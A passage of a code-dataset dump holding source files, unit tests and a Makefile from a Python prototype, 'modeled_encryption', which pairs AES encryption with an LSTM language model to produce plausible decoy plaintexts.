util.packing import pack_ints, unpack_ints\n\nclass TestPacking(unittest.TestCase):\n\n def test_packing(self):\n self.assertEqual(unpack_ints(pack_ints([])), ())\n self.assertEqual(unpack_ints(pack_ints([1])), (1,))\n self.assertEqual(unpack_ints(pack_ints([1, 2])), (1, 2))\n self.assertEqual(unpack_ints(pack_ints([1, 2, 3])), (1, 2, 3))\n" }, { "alpha_fraction": 0.5908513069152832, "alphanum_fraction": 0.5937103033065796, "avg_line_length": 34.772727966308594, "blob_id": "288aa8b52941e31ff5c16267edaf8191e256e181", "content_id": "4fbc3449fb0b3f897a40224182ebc2613bdb9ea7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3148, "license_type": "no_license", "max_line_length": 79, "num_lines": 88, "path": "/src/encryption.py", "repo_name": "stevekrenzel/modeled_encryption", "src_encoding": "UTF-8", "text": "from Crypto.Cipher import AES\nfrom hashlib import sha256\nfrom os import urandom\nfrom encoding import encode, decode\n\n###############################################################################\n# WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARN#\n# #\n# This implements NON-AUTHENTICATED encryption / decryption. #\n# #\n# WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARN#\n###############################################################################\n\ndef encrypt(model, key, plaintext):\n \"\"\"Encrypts the plaintext using AES with a model-based transformation.\n\n Note: If the plaintext does not end with a boundary (e.g. space), it will\n be appended. The boundary is defined in `model.boundary`.\n\n Example:\n >> ciphertext = encrypt(model, \"foo\", \"bar\")\n >> decrypt(model, \"foo\", ciphertext)\n \"BAR \"\n\n Args:\n model (Keras Model): A model that has been trained on a domain related\n to the plaintext being encrypted.\n\n key (string): A key to use to encrypt the plaintext.\n\n plaintext (string): The plaintext to be encrypted. The plaintext\n should only contain values that are present in the `model`'s\n alpahbet.\n\n Returns (bytes):\n The encrypted ciphertext.\n\n Raises:\n ValueError: If `plaintext` contains an item that isn't in the `model`'s\n alphabet.\n\n Exception: If padding the encoded plaintext fails. This is a\n non-deterministic process. The probability of this happening is\n highly unlikely, but not impossible. 
If your model has a boundary\n that occurs with a low-probability and you're getting this\n exception, increase your model's max_padding_trials attribute.\n \"\"\"\n iv = urandom(AES.block_size)\n\n encoded = encode(model, plaintext, AES.block_size)\n encrypted = _get_cipher(key, iv).encrypt(encoded)\n\n return iv + encrypted\n\ndef decrypt(model, key, ciphertext):\n \"\"\"Decrypts the ciphertext using AES with a model-based transformation.\n\n Example:\n >> ciphertext = encrypt(model, \"foo\", \"bar\")\n >> decrypt(model, \"foo\", ciphertext)\n \"BAR \"\n\n Args:\n model (Keras Model): The model that was used when encrypting the\n provided ciphertext.\n\n key (string): A key to use to decrypt the ciphertext.\n\n ciphertext (bytes): The ciphertext to be decrypted.\n\n Returns (string):\n The decrypted plaintext.\n \"\"\"\n iv = ciphertext[:AES.block_size]\n ciphertext = ciphertext[AES.block_size:]\n\n decrypted = _get_cipher(key, iv).decrypt(ciphertext)\n decoded = decode(model, decrypted)\n\n return decoded\n\ndef _get_cipher(key, iv):\n \"\"\" Returns an AES cipher in CFB mode. \"\"\"\n return AES.new(_transform_key(key), AES.MODE_CFB, iv)\n\ndef _transform_key(key):\n \"\"\" Securely hashes a key to a 32 byte block. \"\"\"\n return sha256(bytes(key, 'utf-8')).digest()\n" }, { "alpha_fraction": 0.6537573337554932, "alphanum_fraction": 0.657843291759491, "avg_line_length": 41.00746154785156, "blob_id": "622516ed2b7490c50c83761f5032b2b7f11789fd", "content_id": "148f42d9732778d01bb4afa1de0375e04e58af6d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5629, "license_type": "no_license", "max_line_length": 236, "num_lines": 134, "path": "/src/main.py", "repo_name": "stevekrenzel/modeled_encryption", "src_encoding": "UTF-8", "text": "import argparse\nfrom sys import argv, exit\nfrom getpass import getpass\nfrom base64 import b64encode, b64decode\nfrom model import load_model\nfrom encryption import encrypt, decrypt\nfrom util.io import confirmed_get_pass, read_file\n\ndef encrypt_command(args):\n key = args.key\n if key == None:\n key = confirmed_get_pass(\"Encryption Key: \", \"Confirm Encryption Key: \")\n if key == None:\n print(\"Keys didn't match. Exiting.\")\n exit(2)\n\n model = load_model(args.config)\n # NOTE We rstrip() the plaintext. Input tends to end in newlines and it can\n # be a signal to an attacker (e.g. 
by checking if the decoy output has a newline).\n plaintext = read_file(args.file).rstrip()\n encrypted = encrypt(model, key, plaintext)\n encoded = str(b64encode(encrypted), 'utf-8')\n print(encoded)\n\ndef decrypt_command(args):\n key = args.key\n if key == None:\n key = getpass(\"Decryption Key: \")\n\n model = load_model(args.config)\n encoded = read_file(args.file)\n ciphertext = b64decode(encoded)\n decrypted = decrypt(model, key, ciphertext)\n print(decrypted)\n\ndef train_command(args):\n model = load_model(args.config)\n data = read_file(args.data)\n model.train(data)\n\ndef sample_command(args):\n model = load_model(args.config)\n size = int(args.size)\n novelty = None if args.novelty == None else float(args.novelty)\n print(model.sample(size, novelty))\n\ndef main():\n parser = argparse.ArgumentParser(\n prog='menc',\n formatter_class=argparse.RawDescriptionHelpFormatter,\n description=\"\"\"\\\nPrototype of a modeled encryption implementation.\n\nExample Usage:\n\n Encryption / Descryption\n =============================================================================\n\n - Encrypt a file:\n $ menc encrypt -c models/military/config.json -f filename\n\n - Encrypt from stdin:\n $ echo 'Hello World!' | menc encrypt -c models/military/config.json\n\n - Encrypt from stdin, key provided as arg:\n $ echo 'Hello World!' | menc encrypt -c models/military/config.json -k foo\n\n - Store encrypted result into a file:\n $ echo 'Hello World!' | menc encrypt -c models/military/config.json > encrypted_file\n\n - Decrypt a file:\n $ menc decrypt -c models/military/config.json -f filename\n\n - Decrypt from stdin:\n $ cat encrypted | menc decrypt -c models/military/config.json\n\n - Decrypt from stdin, key provided as arg:\n $ cat encrypted | menc decrypt -c models/military/config.json -k foo\n\n - Store decrypted result into a file:\n $ cat encrypted | menc -c models/military/config.json > decrypted_file\n\n - Round-trip (encrypt and then decrypt):\n $ echo 'Hello world!' | menc encrypt -c models/military/config.json -k foo | menc decrypt -c models/military/config.json -k foo\n\n Training\n =============================================================================\n\n - Train from data in a file:\n $ menc train -c models/military/config.json -d models/military/data.txt\n\n - Train from stdin:\n $ cat models/military/data.txt | menc train -c models/military/config.json\n\n Sampling\n =============================================================================\n\n - Generate a random sequence of length 100:\n $ menc sample -c models/military/config.json -s 100\"\"\")\n subparsers = parser.add_subparsers()\n\n encrypt_parser = subparsers.add_parser('encrypt', help=\"Encrypt a plaintext.\")\n encrypt_parser.add_argument('-c', '--config', metavar=\"CONFIG_PATH\", help=\"Path to the model config.\", required=True)\n encrypt_parser.add_argument('-k', '--key', help=\"The string to use as the encryption key. If ommitted, a password prompt will securely ask for one. Note: Providing a key on the command-line may store the key in your shell history.\")\n encrypt_parser.add_argument('-f', '--file', help=\"File to encrypt. Reads stdin if not provided.\")\n encrypt_parser.set_defaults(func=encrypt_command)\n\n decrypt_parser = subparsers.add_parser('decrypt', help=\"Decrypt a ciphertext.\")\n decrypt_parser.add_argument('-c', '--config', metavar=\"CONFIG_PATH\", help=\"Path to the model config.\", required=True)\n decrypt_parser.add_argument('-k', '--key', help=\"The string to use as the decryption key. 
If ommitted, a password prompt will securely ask for one. Note: Providing a key on the command-line may store the key in your shell history.\")\n decrypt_parser.add_argument('-f', '--file', help=\"File to decrypt. Reads stdin if not provided.\")\n decrypt_parser.set_defaults(func=decrypt_command)\n\n train_parser = subparsers.add_parser('train', help=\"Train a model on a given set of data.\")\n train_parser.add_argument('-c', '--config', metavar=\"CONFIG_PATH\", help=\"Path to the model config.\", required=True)\n train_parser.add_argument('-d', '--data', help=\"Path to data to train on.\")\n train_parser.set_defaults(func=train_command)\n\n sample_parser = subparsers.add_parser('sample', help=\"Sample a random sequence from a model.\")\n sample_parser.add_argument('-c', '--config', metavar=\"CONFIG_PATH\", help=\"Path to the model config.\", required=True)\n sample_parser.add_argument('-s', '--size', help=\"Length of the sequence to generate.\", required=True)\n sample_parser.add_argument('-n', '--novelty', help=\"A float that determines how conservative the predictions are. Lower is more conservative. Typical ranges are 0.1 to 2.0.\")\n sample_parser.set_defaults(func=sample_command)\n\n args = parser.parse_args()\n\n if 'func' not in args:\n parser.print_help()\n exit(1)\n\n args.func(args)\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.4667931795120239, "alphanum_fraction": 0.4667931795120239, "avg_line_length": 26.736841201782227, "blob_id": "8389a9db77c76b32be0a09e013c7d0fa4f47e333", "content_id": "d9d74e1bab600246bd77c22e6937844756b94cb9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 527, "license_type": "no_license", "max_line_length": 85, "num_lines": 19, "path": "/src/util/keras.py", "repo_name": "stevekrenzel/modeled_encryption", "src_encoding": "UTF-8", "text": "\"\"\" Keras writes to stderr unconditionally, so we disable stderr while importing. 
\"\"\"\nimport sys\nfrom os import devnull\n\n#################################\n# Disable stderr\n#################################\n_old_stderr = sys.stderr\nsys.stderr = open(devnull, 'w')\n#################################\n\nfrom keras.models import Sequential\nfrom keras.layers import LSTM, Dense, Activation\n\n#################################\n# Enable stderr\n#################################\nsys.stderr = _old_stderr\n#################################\n" }, { "alpha_fraction": 0.5661799311637878, "alphanum_fraction": 0.593028724193573, "avg_line_length": 39.03773498535156, "blob_id": "e8bbc1c67171b882c84c1e6e8986a22adaf73ada", "content_id": "40615a4d67b3f770b1f6d3d02a5396ffca0a821a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2123, "license_type": "no_license", "max_line_length": 81, "num_lines": 53, "path": "/tests/util/padding_tests.py", "repo_name": "stevekrenzel/modeled_encryption", "src_encoding": "UTF-8", "text": "import unittest\nfrom random import choice\nfrom util.packing import BYTES_IN_INT\nfrom util.padding import pad, unpad\nfrom model import Model\nfrom mock_model import mock_model\n\nclass TestPadding(unittest.TestCase):\n\n def test_padding(self):\n \"\"\" Test round-tripping padding.\n\n Note: This is a non-deterministic test, but should always pass.\n \"\"\"\n model = mock_model()\n\n # Blocksizes that aren't a multiple of BYTES_IN_INT should error.\n for i in range(BYTES_IN_INT):\n with self.assertRaises(ValueError):\n pad(model, [], \"\", i)\n\n # Padding should always add a boundary character if it doesn't end in one\n for message in map(list, [\"\", \"1\", \"12\", \"012\", \"102\"]):\n padded = pad(model, [], message, BYTES_IN_INT)\n unpadded = unpad(model, padded)\n self.assertEqual(unpadded, message + ['0'])\n\n # Padding should not add a boundary character if it already ends in one\n for message in map(list, [\"0\", \"00\", \"10\", \"120\", \"0120\", \"1020\"]):\n padded = pad(model, [], message, BYTES_IN_INT)\n unpadded = unpad(model, padded)\n self.assertEqual(unpadded, message)\n\n # Test various blocksizes and message lengths\n blocksizes = range(BYTES_IN_INT, 10 * BYTES_IN_INT, BYTES_IN_INT)\n\n for message_length in range(0, 20):\n for blocksize in blocksizes:\n message = [choice(\"012\") for _ in range(message_length)] + ['0']\n padded = pad(model, [], message, blocksize)\n self.assertEqual((len(padded) * BYTES_IN_INT) % blocksize, 0)\n self.assertEqual(message, list(unpad(model, padded)))\n\n def test_unpad(self):\n model = mock_model()\n\n self.assertEqual(unpad(model, \"\"), \"\")\n self.assertEqual(unpad(model, \"0\"), \"\")\n self.assertEqual(unpad(model, \"00\"), \"0\")\n self.assertEqual(unpad(model, \"10\"), \"1\")\n self.assertEqual(unpad(model, \"010\"), \"0\")\n self.assertEqual(unpad(model, \"110\"), \"11\")\n self.assertEqual(unpad(model, \"0110\"), \"0\")\n\n" }, { "alpha_fraction": 0.5741626620292664, "alphanum_fraction": 0.5961722731590271, "avg_line_length": 34.423728942871094, "blob_id": "42ea08ab04371c391e377f072936e339329aadf6", "content_id": "54cda7ec6d35ad75a6180e881ab6379be44906e1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2090, "license_type": "no_license", "max_line_length": 109, "num_lines": 59, "path": "/tests/model_tests.py", "repo_name": "stevekrenzel/modeled_encryption", "src_encoding": "UTF-8", "text": "import unittest\nfrom random import choice\nfrom encoding import encode, decode\nfrom 
mock_model import mock_model, config\n\nclass TestModel(unittest.TestCase):\n\n def test_predict(self):\n cfg = config()\n cfg['model']['alphabet'] = \"01\"\n model = mock_model(cfg)\n sequence = \"001\"\n result = model.predict(sequence)\n\n # Ensure we're one-hot encoding\n self.assertEqual(model.model.last_sequence.tolist(), [[[True, False], [True, False], [False, True]]])\n\n # Ensure we're normalizing probabilities\n self.assertEqual(result.tolist(), [0.5, 0.5])\n\n def test_sample(self):\n model = mock_model()\n\n sequence = model.sample(0)\n self.assertEqual(0, len(sequence))\n\n sequence = model.sample(100)\n self.assertEqual(100, len(sequence))\n\n # This assert is non-deterministic, but should always pass.\n # Could in theory get a sequence of all '0's or something though.\n self.assertEqual(set(model.config.model.alphabet), set(sequence))\n\n def test_translations(self):\n cfg = config()\n cfg['transformations']['translate'] = [\"ab\", \"01\"]\n model = mock_model(cfg)\n self.assertEqual(model.transform(\"abab\"), \"0101\")\n\n def test_substitutions(self):\n cfg = config()\n cfg['transformations']['substitutions'] = [[\"ab\", \"0\"], [\"ba\", \"1\"]]\n model = mock_model(cfg)\n self.assertEqual(model.transform(\"abba\"), \"01\")\n\n def test_translation_and_substitution(self):\n cfg = config()\n cfg['transformations']['translate'] = [\"ab\", \"01\"]\n cfg['transformations']['substitutions'] = [[\"11\", \"1\"], [\"01\", \"1\"], [\"10\", \"0\"]]\n model = mock_model(cfg)\n self.assertEqual(model.transform(\"abba\"), \"0\")\n\n def test_invalid_transformation(self):\n cfg = config()\n cfg['transformations']['translate'] = [\"01\", \"ab\"]\n cfg['transformations']['substitutions'] = [[\"a\", \"aa\"], [\"b\", \"bb\"]]\n model = mock_model(cfg)\n with self.assertRaises(Exception):\n model.transform(\"0101\")\n" }, { "alpha_fraction": 0.6390010118484497, "alphanum_fraction": 0.6652371287345886, "avg_line_length": 36.046730041503906, "blob_id": "98a29c03723158319dca0bf66f2ae76c05ef73dc", "content_id": "ffa241f34a17aec7c34418bd38cebe09f8e2508d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3964, "license_type": "no_license", "max_line_length": 81, "num_lines": 107, "path": "/src/util/modeling.py", "repo_name": "stevekrenzel/modeled_encryption", "src_encoding": "UTF-8", "text": "from .sampling import choose_choice, choose_weight\nfrom .math import scale\nfrom .packing import MAX_INT\n\ndef tabulate(model, initial, values, novelty=None):\n \"\"\"Given a sequence of values, this returns a list of random integer\n weights drawn from to ranges corresponding to the model's probability of\n predicting each value.\n\n Example:\n >> initial = list(\"THIS IS AN INITIAL SEQUENCE FOR AN EXAMPLE FOOBAR \")\n >> list(tabulate(model, initial, \"HELLO\"))\n [3248025205, 3874735365, 4292362767, 3915527017, 4267391621]\n >> \"\".join(recite(model, initial, _))\n \"HELLO\"\n\n Args:\n model (Model): The model to use for predictions.\n\n initial (list): The initial sequence to feed to the model.\n\n values (list): The values to generate weights for.\n\n novelty (float, optional): The conservativeness of the predictions.\n\n Return (generator(int)):\n A list of randomized weights corresponding to the model's probability\n of predicting each value.\n \"\"\"\n alphabet = model.config.model.alphabet\n\n def fn(value, weights):\n weight = choose_weight(value, alphabet, weights)\n return (value, weight)\n\n return _scan_model(model, fn, initial, 
values, novelty)\n\ndef recite(model, initial, weights, novelty=None):\n \"\"\"Given a sequence of weights, this returns the values that correspond to\n the model's predictions for each weight.\n\n Example:\n >> initial = list(\"THIS IS AN INITIAL SEQUENCE FOR AN EXAMPLE FOOBAR \")\n >> weights = [3248025205, 3874735365, 4292362767, 3915527017, 4267391621]\n >> list(recite(model, initial, weights))\n ['H', 'E', 'L', 'L', 'O']\n\n Args:\n model (Model): The model to use for predictions.\n\n initial (list): The initial sequence to feed to the model.\n\n weights (list(int)): The weights to use when choosing values.\n\n novelty (float, optional): The conservativeness of the predictions.\n\n Returns (generator):\n A sequence of values as chosen by the provided weights.\n \"\"\"\n alphabet = model.config.model.alphabet\n\n def fn(weight, weights):\n value = choose_choice(weight, alphabet, weights)\n return (value, value)\n\n return _scan_model(model, fn, initial, weights, novelty)\n\ndef _scan_model(model, fn, init, xs, novelty=None):\n \"\"\"For every value in `xs`, this calls `fn` with both the value and the\n weights of the model's current predictions. The sequence being fed to the\n model is then updated, and we repeat the process.\n\n The function, `fn`, returns two values. This function accumulates the\n second of these values and returns them in a generator.\n\n This function is similar in spirit to Haskell's scanl, but applied to a\n model instead of a list. Scanl is just like reduce in Python, but every\n intermediate value gets returned instead of just the final accumulated\n value.\n\n See `tabulate` and `recite` for example usage.\n\n Args:\n model (Model): The model to use for predictions.\n\n fn (function): A function that takes a value and a list of weights and\n returns the next value in a sequence for the model, as well as a\n value to be accumulated and returned from this function.\n\n init (list): The initial values to feed to the model.\n\n xs (list): The values to feed to `fn`.\n\n novelty (float): The conservativeness of the predictions.\n\n Returns (generator):\n A sequence of the values computed by `fn`.\n \"\"\"\n sequence_length = model.config.model.sequence_length\n sequence = init[-sequence_length:]\n for x in xs:\n probabilities = model.predict(sequence, novelty)\n # We use (MAX_INT + 1) because weights are chosen 0 <= w <= MAX_INT\n scaled = scale(probabilities, MAX_INT + 1, lowest=1)\n (next_value, y) = fn(x, scaled)\n yield y\n sequence = (sequence + [next_value])[-sequence_length:]\n" }, { "alpha_fraction": 0.6836419701576233, "alphanum_fraction": 0.709876537322998, "avg_line_length": 45.28571319580078, "blob_id": "cbadef2aabce169f121d839795a798a8c666bc58", "content_id": "505b536fead0ca065be193f844739b11854e6401", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 648, "license_type": "no_license", "max_line_length": 83, "num_lines": 14, "path": "/Makefile", "repo_name": "stevekrenzel/modeled_encryption", "src_encoding": "UTF-8", "text": "test:\n\tPYTHONPATH='src':'tests' python -m unittest discover -s . -p '*_tests.py'\n\n# Usage: make HOST=127.0.0.1 CUDNN_TARBALL=~/cudnn-8.0-linux-x64-v5.1.tgz ec2_setup\n# The cudnn tarball can't be downloaded without being authenticated on NVidia's\n# developer portal. It's lame. 
That's why we need to download locally and then\n# upload to remote machine.\n# Assumes running Ubuntu on g2.2xlarge or p2.xlarge (or equivalent)\nec2_setup:\n\tscp $$CUDNN_TARBALL ubuntu@$$HOST:~/\n\tscp ./src/setup.sh ubuntu@$$HOST:~/\n\tssh ubuntu@$$HOST 'sh ~/setup.sh'\n\t@echo \"*** Remote environment is ready. ***\"\n\t@echo \"Run 'ssh ubuntu@$$HOST' to start using menc there.\"\n" }, { "alpha_fraction": 0.6399644613265991, "alphanum_fraction": 0.6433392763137817, "avg_line_length": 34.632911682128906, "blob_id": "85bfc592d359b103a0a8cad378cfee9a41f52704", "content_id": "17e72ae0db9848409990dfdcf7921835001a280e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5630, "license_type": "no_license", "max_line_length": 140, "num_lines": 158, "path": "/src/util/padding.py", "repo_name": "stevekrenzel/modeled_encryption", "src_encoding": "UTF-8", "text": "from random import SystemRandom\nfrom .modeling import recite\nfrom .lists import drop_tail_until\nfrom .packing import BYTES_IN_INT\nfrom .randoms import random_ints\n\nRAND = SystemRandom()\n\ndef pad(model, initial, values, blocksize):\n \"\"\"Extends the provided values with model predictions to make the total\n length of (initial + values) equal to a multiple of blocksize.\n\n We do this by continuously generating potential suffixes until a boundary\n is hit. Once a boundary is hit (e.g. a full token is formed), we split the\n token into prefixes that when appended to the provided payload will result\n in a new payload that is the correct length.\n\n Of these candidate prefixes, we then uniformly sample them and choose one\n to use as padding.\n\n This process ensures that the payload always ends with a partial or\n complete token (with or without the trailing boundary character).\n\n Example:\n >> initial = list(\"THIS IS AN INITIAL SEQUENCE FOR AN EXAMPLE FOOBAR \")\n >> padd(model, initial, list(\"HELLO\"), 16)\n ['H', 'E', 'L', 'L', 'O', ' ', 'M', 'U', 'C']\n >> pad(model, initial, list(\"FOO \"), 16)\n ['F', 'O', 'O', ' ', 'F', 'R', 'O', 'M', ' ']\n >> \"\".join(_)\n 'FOO FROM '\n\n Args:\n model (Model): The model to use for encoding.\n\n initial (list): The initial sequence used to seed the model.\n\n values (list): The values to pad.\n\n blocksize (int): The mutliple that we need to pad to.\n\n Returns:\n A list of values + padding.\n\n Raises:\n ValueError: If blocksize is not a multiple of 4 or greater than 0.\n\n Exception: If padding fails to generate. This is a non-deterministic\n process, so trying again may work. This is extremely unlikely to be\n raised if you have any reasonable padding_novelty_growth_rate and\n max_padding_trials in your config.\n \"\"\"\n\n if blocksize < 1 or blocksize % BYTES_IN_INT != 0:\n raise ValueError(\"Blocksize must be greater than 0.\")\n\n boundary = model.config.model.boundary\n if len(values) == 0 or values[-1] != boundary:\n values = values + [boundary]\n\n length = _base_length(model, values)\n block_capacity = blocksize // BYTES_IN_INT\n first_length = block_capacity - (length % block_capacity)\n joined = initial + values\n\n for token in _tokens(model, joined):\n if len(token) >= first_length:\n offsets = range(first_length, len(token) + 1, block_capacity)\n token_prefixes = [token[:j] for j in offsets]\n padding = RAND.choice(token_prefixes)\n return values + padding\n\n raise Exception(\"Failed to generate padding. This is non-deterministic. 
Run again or try increasing padding_novelty_growth_rate count.\")\n\ndef unpad(model, values):\n \"\"\"Removes the last token (including any trailing boundaries) from values.\n\n Example:\n >> unpad(model, \"FOO BAR \")\n 'FOO '\n >> unpad(model, \"HELLO MUC\")\n 'HELLO '\n >> unpad(model, \"HELLO \")\n 'HELLO'\n >> unpad(model, \"HELLO\")\n 'HELLO'\n\n Args:\n model (Model): The model that was used to pad this input.\n\n values (list): The values to remove padding from.\n\n Returns:\n A copy of `values` with the last token removed, or unchanged if there\n is only one token.\n \"\"\"\n boundary = model.config.model.boundary\n\n # Trim boundary if it's on the end then drop token.\n if len(values) > 0 and values[-1] == boundary:\n values = values[:-1]\n\n return drop_tail_until(boundary, values)\n\ndef _tokens(model, base):\n \"\"\" Generates a stream of tokens with increasing novelty. \"\"\"\n for novelty in _novelities(model):\n yield _generate_token(model, base, novelty)\n\ndef _novelities(model):\n \"\"\" A sequence of increasing novelities. \"\"\"\n trials = model.config.encoding.max_padding_trials\n growth_rate = model.config.encoding.padding_novelty_growth_rate\n novelty = model.config.encoding.novelty\n for i in range(trials):\n yield novelty * (growth_rate ** i)\n\ndef _generate_token(model, start, novelty):\n \"\"\"Generates a random single token following the `start` sequence.\n\n Note: If the probability of generating a boundary character is low then\n this could take a while to run. It won't stop trying to generate values\n until it succeeds in generating a boundary.\n\n Example:\n >> initial = list(\"THIS IS AN INITIAL SEQUENCE FOR AN EXAMPLE FOOBAR \")\n >> _generate_token(model, initial, 1.0)\n ['A', 'N', 'D', ' ']\n >> _generate_token(model, initial, 1.0)\n ['M', 'E', 'A', 'N', 'S', ' ']\n\n Args:\n model (Model): The model to be used for prediction.\n\n start (list): The sequence to generate a subsequent token for.\n\n novelty (float): The conservativeness of the token generation.\n\n Returns:\n A random token that the model believes would reasonably follow the\n provided sequence.\n \"\"\"\n # Non-deterministic. If `boundary` has a low prob of being generated, this\n # could take a while to run.\n boundary = model.config.model.boundary\n stream = recite(model, start, random_ints(), novelty) # Infinite stream\n token = []\n for c in stream:\n token.append(c)\n if c == boundary:\n return token\n\ndef _base_length(model, values):\n \"\"\" Returns the length of the payload without padding. 
\"\"\"\n init = model.config.model.sequence_length\n norm = model.config.encoding.normalizing_length\n prim = model.config.encoding.priming_length\n return init + norm + prim + len(values)\n" }, { "alpha_fraction": 0.6159090995788574, "alphanum_fraction": 0.6280303001403809, "avg_line_length": 43, "blob_id": "d26beb4c96575e75b06a77b1c27ad805d9d11ce5", "content_id": "3f5f45366a2516f71418b75189edca2bdee3747f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1320, "license_type": "no_license", "max_line_length": 91, "num_lines": 30, "path": "/tests/encryption_tests.py", "repo_name": "stevekrenzel/modeled_encryption", "src_encoding": "UTF-8", "text": "import unittest\nfrom random import choice\nfrom encryption import encrypt, decrypt\nfrom mock_model import mock_model\n\nclass TestEncryption(unittest.TestCase):\n\n def test_encryption(self):\n \"\"\" Test round-trip encryption.\n\n Note: This is a non-deterministic test, but should always pass.\n \"\"\"\n model = mock_model()\n\n # If message doesn't end in boundary, it should be appended.\n self.assertEqual(decrypt(model, \"foo\", encrypt(model, \"foo\", \"\")), \"0\")\n self.assertEqual(decrypt(model, \"foo\", encrypt(model, \"foo\", \"0\")), \"0\")\n self.assertEqual(decrypt(model, \"foo\", encrypt(model, \"foo\", \"1\")), \"10\")\n\n # Test a bunch of random messges of varying lengths\n for i in range(30):\n message = \"\".join(choice(\"01\") for _ in range(i)) + model.config.model.boundary\n result = decrypt(model, \"foo\", encrypt(model, \"foo\", message))\n self.assertEqual(message, result)\n\n # Test a bunch of random messges using wrong key\n for i in range(60, 90): # Short bit strings may match by chance, so we go long\n message = \"\".join(choice(\"01\") for _ in range(i)) + model.config.model.boundary\n result = decrypt(model, \"bar\", encrypt(model, \"foo\", message))\n self.assertNotEqual(message, result)\n" }, { "alpha_fraction": 0.5205913186073303, "alphanum_fraction": 0.5533263087272644, "avg_line_length": 36.880001068115234, "blob_id": "fa54836cb7384ebf5db4debf2a82eb2247d07d3d", "content_id": "db7446778fe52121c610529cde7b0f0d4d52aed4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2841, "license_type": "no_license", "max_line_length": 69, "num_lines": 75, "path": "/tests/util/sampling_tests.py", "repo_name": "stevekrenzel/modeled_encryption", "src_encoding": "UTF-8", "text": "import unittest\nfrom util.sampling import choose_choice, choose_weight\n\nclass TestSampling(unittest.TestCase):\n\n def test_sampling(self):\n \"\"\" This is a non-deterministic round-trip test. 
\"\"\"\n for _ in range(10):\n choices = [1, 2, 3, 4, 5]\n weights = [1, 2, 3, 4, 5]\n for choice in choices:\n weight = choose_weight(choice, choices, weights)\n chosen = choose_choice(weight, choices, weights)\n self.assertEqual(choice, chosen)\n\n def test_choose_choice(self):\n # No negative weights\n with self.assertRaises(ValueError):\n choose_choice(-1, [], [])\n\n # Weights and choices must be equal length\n with self.assertRaises(ValueError):\n choose_choice(0, [0], [])\n\n # Weights must sum to greater than weight\n with self.assertRaises(ValueError):\n choose_choice(2, [1, 0], [0, 1])\n\n # Can't have zero choices\n with self.assertRaises(ValueError):\n choose_choice(0, [], [])\n\n self.assertEqual(choose_choice(0, \"a\", [1]), \"a\")\n\n # Single weight\n self.assertEqual(choose_choice(0, \"a\", [2]), \"a\")\n self.assertEqual(choose_choice(1, \"a\", [2]), \"a\")\n\n # Uniform weight\n self.assertEqual(choose_choice(0, \"ab\", [1, 1]), \"a\")\n self.assertEqual(choose_choice(1, \"ab\", [1, 1]), \"b\")\n\n # Skewed weight\n self.assertEqual(choose_choice(0, \"ab\", [1, 2]), \"a\")\n self.assertEqual(choose_choice(1, \"ab\", [1, 2]), \"b\")\n self.assertEqual(choose_choice(2, \"ab\", [1, 2]), \"b\")\n\n # Zero weight\n self.assertEqual(choose_choice(0, \"abc\", [1, 0, 2]), \"a\")\n self.assertEqual(choose_choice(1, \"abc\", [1, 0, 2]), \"c\")\n self.assertEqual(choose_choice(2, \"abc\", [1, 0, 2]), \"c\")\n\n def test_choose_weight(self):\n # Weights and choices must be equal length\n with self.assertRaises(ValueError):\n choose_weight(\"a\", \"a\", [])\n\n # Choice must be present in choices\n with self.assertRaises(ValueError):\n choose_weight(\"b\", \"a\", [0])\n\n # Single choice\n self.assertEqual(choose_weight(\"a\", \"a\", [1]), 0)\n\n # Uniform determinisitic\n self.assertEqual(choose_weight(\"a\", \"ab\", [1,1]), 0)\n self.assertEqual(choose_weight(\"b\", \"ab\", [1,1]), 1)\n\n # Non-deterministic sampling here\n self.assertTrue(choose_weight(\"a\", \"abc\", [2,2,2]) in [0, 1])\n self.assertTrue(choose_weight(\"a\", \"abc\", [2,2,2]) in [0, 1])\n self.assertTrue(choose_weight(\"b\", \"abc\", [2,2,2]) in [2, 3])\n self.assertTrue(choose_weight(\"b\", \"abc\", [2,2,2]) in [2, 3])\n self.assertTrue(choose_weight(\"c\", \"abc\", [2,2,2]) in [4, 5])\n self.assertTrue(choose_weight(\"c\", \"abc\", [2,2,2]) in [4, 5])\n" }, { "alpha_fraction": 0.489673912525177, "alphanum_fraction": 0.5179347991943359, "avg_line_length": 23.53333282470703, "blob_id": "6926fcbfc1fd738d2426f3b58dac0a20cdd1795b", "content_id": "05a6ed8a9e8cbad932c7e2d2ed4e71e34fb44343", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1840, "license_type": "no_license", "max_line_length": 76, "num_lines": 75, "path": "/src/util/lists.py", "repo_name": "stevekrenzel/modeled_encryption", "src_encoding": "UTF-8", "text": "from itertools import chain\n\ndef rfind(x, xs):\n \"\"\"Finds the right-most index of an element in a list.\n\n Example:\n >> rfind(3, [1, 2, 3, 1, 2, 3])\n 5\n >> rfind(4, [1, 2, 3, 1, 2, 3])\n None\n\n Args:\n x (obj): The element to find the index of.\n\n xs (list): The list to search through.\n\n Returns:\n The index of the right-most occurence of `x` in `xs`, or None if it\n isn't in the list.\n \"\"\"\n for i in range(len(xs) - 1, -1, -1):\n if xs[i] == x:\n return i\n return None\n\ndef drop_tail_until(x, xs):\n \"\"\"Removes all right-most elements from a list until a value is found.\n\n Example:\n >> drop_tail_until(1, [1, 2, 3, 1, 
